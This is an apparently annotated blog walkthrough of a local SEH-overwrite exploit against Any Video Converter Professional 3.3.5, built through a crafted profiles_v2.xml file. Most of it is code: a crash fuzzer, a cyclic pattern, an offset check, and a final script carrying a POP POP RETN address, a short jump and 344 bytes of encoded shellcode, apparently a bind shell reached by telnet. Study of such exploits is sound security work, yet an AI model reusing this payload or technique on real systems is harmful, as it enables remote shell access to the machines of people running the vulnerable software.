This time I try to exploit the application Any Video Converter Professional V 3.3.5 via a local exploit.
- First, I write a fuzzer like the one below.
#!usr/bin/python
Run the fuzzer to create the file, then replace the one in the application directory with it. After that, open the application with OllyDbg and press Shift+F9 to see the effect.
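# Stage 1 of the post: a minimal crash trigger.  Writes a profiles_v2.xml in
# the current directory whose first <category name="..."> attribute is a
# 2000-character run of "A" (0x41); the post copies the file over the one in
# the application directory and watches the crash under OllyDbg.
#
# The original used the Python 2 print statement and left the file handle
# open if write() raised; the parenthesised print and the with-block below
# behave the same under Python 2 and 3 (only ASCII is written here, so text
# mode does not change any byte values).
file = "profiles_v2.xml"
dead = "\x41" * 2000  # overlong category name: 2000 x "A"

# The same document the post builds, assembled piecewise for readability.
poc = "".join([
    "<root>\n",
    "<categories>\n",
    "<category name=\"" + dead + "\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n",
    "</categories>\n",
    "<groups></groups>\n<profiles></profiles>\n</root>\n",
])

# Context manager: the handle is closed even if write() raises.
with open(file, "w") as writeFile:
    writeFile.write(poc)
print("Success Creating File")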
The application crashes; then view the SEH chain.
The SE handler is successfully overwritten.
Next, press Shift+F9 to overwrite EIP.
- Second, look for the modules loaded by the application. Here I found and used DVcapture.dll. Then check the module using msfpescan.
As in the previous case, this step aims to check whether or not the module contains the value 0x0400. OK, the module can be used as a stepping stone.
Then search for a POP, POP, RETN instruction sequence in this module.
We can see that the address does not contain the characters 00, 0a, or 0d.
- Next, create a pattern and put it into the fuzzer.
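#!/usr/bin/python
# Stage 2 of the post: the 2000 x "A" run is replaced by a cyclic,
# non-repeating pattern so that the value which lands in EIP can be turned
# into an offset with pattern_offset.
#
# The post pastes the 2000-character pattern literally, and the paste broke
# it across two lines (an unterminated string literal).  The identical string
# is generated here instead: triplets of <upper><lower><digit> with the digit
# cycling fastest ("Aa0Aa1Aa2..."), truncated to 2000 characters, so it ends
# in "...Co5Co" exactly as in the post.
#
# Also fixed: the shebang lacked its leading slash, a stray "" literal after
# "<categories>\n", the Python 2-only print statement, and the file handle
# that stayed open if write() raised.
import itertools
import string

PATTERN_LENGTH = 2000

file = "profiles_v2.xml"
dead = "".join(
    upper + lower + digit
    for upper, lower, digit in itertools.product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits
    )
)[:PATTERN_LENGTH]

# The same document the post builds, assembled piecewise for readability.
poc = "".join([
    "<root>\n",
    "<categories>\n",
    "<category name=\"" + dead + "\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n",
    "</categories>\n",
    "<groups></groups>\n<profiles></profiles>\n</root>\n",
])

# Context manager: the handle is closed even if write() raises.
with open(file, "w") as writeFile:
    writeFile.write(poc)
print("Success Creating File")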
Note the EIP value shown above, then compute the offset with pattern_offset.
Put the offset into the fuzzer.
#!usr/bin/python
# Stage 3 of the post: verify the offset computed with pattern_offset.
# Python 2 script (print statement; str is a byte string).  The category
# name is now laid out as:
#   328 x "A"        filler up to the offset the post computed
#   4 x 0xCC         INT3 breakpoint opcodes: if execution ever reaches the
#                    bytes at offset 328, a debugger stops right there
#   4 x "A"          the following 4 bytes (the final script of the post puts
#                    the POP, POP, RETN address in this slot)
#   NOP padding      up to 336 bytes -- 328 + 4 + 4 is already 336, so the
#                    padding expression below contributes zero bytes
#
# NOTE(review): the shebang is missing its leading slash ("#!usr/bin/python").
# NOTE(review): "\xcc" is a single byte only under Python 2.  Under Python 3
# the same escape is a one-character str which text-mode write() would UTF-8
# encode (0xCC -> 0xC3 0x8C), changing the file layout.
file="profiles_v2.xml"
dead ="\x41" * 328
dead+="\xcc\xcc\xcc\xcc"
dead+="\x41\x41\x41\x41"
dead+="\x90" * (336 - len(dead))
poc="<root>\n"
poc=poc + "<categories>\n"
# Attribute value carrying the crafted bytes; the rest of the document is
# the minimal skeleton the application expects.
poc=poc + "<category name=\"" + dead + "\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"
poc=poc + "</categories>\n"
poc=poc + "<groups></groups>\n<profiles></profiles>\n</root>\n"
# Written in text mode; on Windows "\n" becomes "\r\n" outside the attribute.
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print "Success Creating File"
It can be confirmed that the count is correct.
- The next step is to control the CPU by entering the address of POP, POP, RETN into the fuzzer.
The address successfully controls the SE handler.
- Then generate the payload and attach it to the fuzzer.
#!usr/bin/python
After that, open the application without OllyDbg.
# Final stage of the post (Python 2 script: print statement, str is a byte
# string; the shebang on the line above is missing its leading slash).
# The category name is laid out as:
#   328 x "A"            filler up to the offset computed with pattern_offset
#   EB 06 90 90          short JMP +6 followed by two NOPs -- the jump skips
#                        the 4-byte address that follows and lands on the
#                        payload bytes
#   77 C1 01 10          little-endian 0x1001C177: per the post, the
#                        POP, POP, RETN address found in DVcapture.dll, used
#                        as the overwritten SE handler
#   payload              344 bytes (21 lines of 16 plus one of 8), pasted
#                        from the post; what it does cannot be determined
#                        from this page -- the post only says telnet is used
#                        afterwards
#   NOP padding          "\x90" * (336 - len(dead)): len(dead) is already
#                        680 here, so the multiplier is negative and this
#                        line contributes nothing
#
# NOTE(review): this only works because the handler address comes from a
# module the post checked for the 0x0400 flag (which looks like the SafeSEH
# / NO_SEH DllCharacteristics check -- confirm); modules built with SafeSEH,
# plus DEP and ASLR on the process, would remove this stepping stone.
# NOTE(review): under Python 3 the "\x.." escapes above 0x7F would be UTF-8
# encoded by text-mode write(), breaking every offset in this file.
file="profiles_v2.xml"
dead ="\x41" * 328
dead+="\xeb\x06\x90\x90"
dead+="\x77\xC1\x01\x10"
dead+=("\xbe\x1b\x3f\xa3\x3e\x31\xc9\xb1\x51\xdb\xcd\xd9\x74\x24\xf4\x5a"
"\x31\x72\x0e\x83\xea\xfc\x03\x69\x35\x41\xcb\x71\x23\x6e\x79\x61"
"\x4d\x8f\x7d\x8e\xce\xfb\xee\x54\x2b\x77\xab\xa8\xb8\xfb\x31\xa8"
"\xbf\xec\xb1\x07\xd8\x79\x9a\xb7\xd9\x96\x6c\x3c\xed\xe3\x6e\xac"
"\x3f\x34\xe9\x9c\xc4\x74\x7e\xdb\x05\xbe\x72\xe2\x47\xd4\x79\xdf"
"\x13\x0f\xaa\x6a\x79\xc4\xf5\xb0\x80\x30\x6f\x33\x8e\x8d\xfb\x1c"
"\x93\x10\x17\xa1\x87\x99\x6e\xc9\xf3\x81\x11\xd2\xcd\x62\xb5\x5f"
"\x6e\xa5\xbd\x1f\x7d\x4e\xb1\x83\xd0\xdb\x72\xb3\x74\xb4\xfc\x8d"
"\x86\xa8\x51\xee\x41\x56\x01\x76\x06\xa4\x97\x1e\xa1\xb9\xe5\x81"
"\x19\xc1\xda\x55\x69\xd0\x27\x9e\x3d\xd4\x0e\xbf\x34\xcf\xc9\xbe"
"\xaa\x18\x14\x95\x5e\x1b\xe7\xc5\xf7\xc2\x1e\x10\xaa\xa2\xdf\x0c"
"\xe6\x1f\x73\xe3\x5a\xe3\x21\x40\x0e\x1c\x16\x22\xd8\xf3\xcb\xca"
"\x4b\x7d\x12\x87\x04\xd9\xcf\xd7\x13\x76\x0f\xc1\xf6\x69\xbe\xb8"
"\xf9\x5a\x28\xe6\xab\x75\x40\xb1\x4c\x5f\xc1\x68\x4c\xb0\x8e\x77"
"\xfb\xb7\x06\x24\x03\x61\xc8\x9a\xaf\xdb\x16\xf2\xc3\x8c\x0f\x8b"
"\x25\x35\x87\x94\x7c\x93\xd8\xba\xe7\x76\x43\x5c\x80\xe5\xe6\x29"
"\xb5\x80\xa8\x70\x1f\x99\xc0\x65\x35\x65\x5a\x8b\xfb\xa5\xaf\xe1"
"\x02\x67\x7d\x0b\xb8\x44\xee\x7e\x47\xad\xbb\x2b\x13\xa5\xc9\xd5"
"\xd7\x25\xd1\x5c\x5c\xb2\xfb\xc5\x0b\x1e\x55\xa8\xe2\xf4\x54\x1b"
"\x54\x5c\x06\x64\x86\x36\x05\x43\x22\x09\x06\x8c\xfb\xff\x56\x8d"
"\x33\xff\x79\xfa\x6b\x03\xfa\x38\xf7\x04\x2b\x92\x07\x2a\xbc\x6c"
"\x22\x29\x4e\xc3\x2f\x78\x4e\x33")
# Negative multiplier at this point (see header comment): adds no bytes.
dead+="\x90" * (336 - len(dead))
poc="<root>\n"
poc=poc + "<categories>\n"
# Attribute value carrying the crafted bytes; the rest of the document is
# the minimal skeleton the application expects.
poc=poc + "<category name=\"" + dead + "\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"
poc=poc + "</categories>\n"
poc=poc + "<groups></groups>\n<profiles></profiles>\n</root>\n"
# Written in text mode; on Windows "\n" becomes "\r\n" outside the attribute.
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print "Success Creating File"
And then run the telnet command.
Success, alhamdulillah ^^